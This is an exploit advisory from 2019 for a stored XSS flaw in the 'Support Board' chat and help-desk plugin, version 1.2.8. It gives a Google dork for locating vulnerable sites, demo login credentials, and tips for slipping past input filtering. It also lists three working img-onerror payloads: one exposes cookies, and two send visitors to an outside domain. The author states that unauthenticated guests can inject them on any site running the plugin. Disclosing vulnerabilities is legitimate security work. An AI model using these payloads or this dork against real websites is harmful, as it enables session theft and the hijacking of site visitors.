/*!
* ::- Title: Support Board - Chat And Help Desk | Support & Chat v1.2.8 Stored XSS Injection
* ::- Author: m0ze
* ::- Date: 2019/06/11
* ::- Software: Support Board - Chat And Help Desk | Support & Chat v1.2.8
*/
::- Details & Description -::
~ Weak security measures like bad textarea data filtering has been discovered in the «Support Board - Chat And Help Desk | Support & Chat». Current version of this web-application is 1.2.8.
::- Demo Website -::
~ https://codecanyon.net/item/support-board-chat-and-help-desk/20752085
~ https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
~ Backend: https://board.support/desk-demo/?login=true
~ Login / Password: demo@board.support / demo
::- Special Note -::
~ Don't use double quotes inside your payload - they'll be filtered. Avoid to use specific protocol type like http: or https: - your payload will be broken.
::- Google Dork -::
~ inurl:"/wp-content/plugins/supportboard"
::- PoC Link -::
~ https://board.support/desk-demo/?login=true
::- PoC [Stored XSS Injection] -::
~ Go to the demo website https://board.support/desk-demo/?login=true and log in with provided credentials (actually, auth process is not necessary and u can inject your payload as a guest on any website with this plugin up and runnung). Most stable and usefull attack vector is to use the <img> tag with your payload inside, check the provided examples below.
~ Example #1: <img src=x onerror=alert(document.cookie)>
~ Example #2: <img src=x onerror=alert('m0ze');window.open('//m0ze.ru/')>
~ Example #3: <img src=x onerror=alert('m0ze');window.location='//m0ze.ru/'>